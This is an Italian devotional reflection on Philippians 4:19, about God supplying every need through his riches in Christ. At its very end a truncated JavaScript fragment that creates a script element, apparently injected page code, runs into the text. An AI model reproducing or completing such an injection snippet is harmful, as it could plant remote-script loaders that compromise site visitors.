IO SUPPLIRÒ QUALSIASI TUO BISOGNO, TRAMITE LE MIE ETERNE RICCHEZZE IN GESÙ CRISTO.

Ora il mio Dio supplirà ad ogni vostro bisogno secondo le sue ricchezze in gloria, in Cristo Gesù. (Filippesi 4:19)

Il nostro Dio e Padre ha promesso di soddisfare ogni nostro bisogno in base alle immense ricchezze del deposito glorioso celeste che è in Gesù Cristo.  Il nostro Dio sa di che cosa abbiamo bisogno prima ancora che abbiamo quel bisogno e si diletta a provvederci ciò che ci serve… quando ci serve.

Che si tratti di una necessità fisica o spirituale, il nostro Padre celeste è un Padre che provvede per i suoi figli. In questo specifico passaggio, Paolo scrive ai Filippesi e li ringrazia per il dono che gli hanno fatto avere per aiutarlo a portare avanti il lavoro per il Regno di Dio.

Paolo li incoraggia che, per come sono stati obbedienti a condividere ciò che avevano, Dio continuerà a versare le Sue risorse del cielo quando loro avranno qualche bisogno. Anche se non abbiamo un grosso conto in banca sulla terra, possiamo riposare sul fatto che abbiamo accesso alle vere ricchezze eterne che sono conservate nel cielo per noi, attraverso la gloriosa ricchezza, il nostro fratello maggiore, Gesù Cristo.var d=document;var s=d.createElement(‘script’);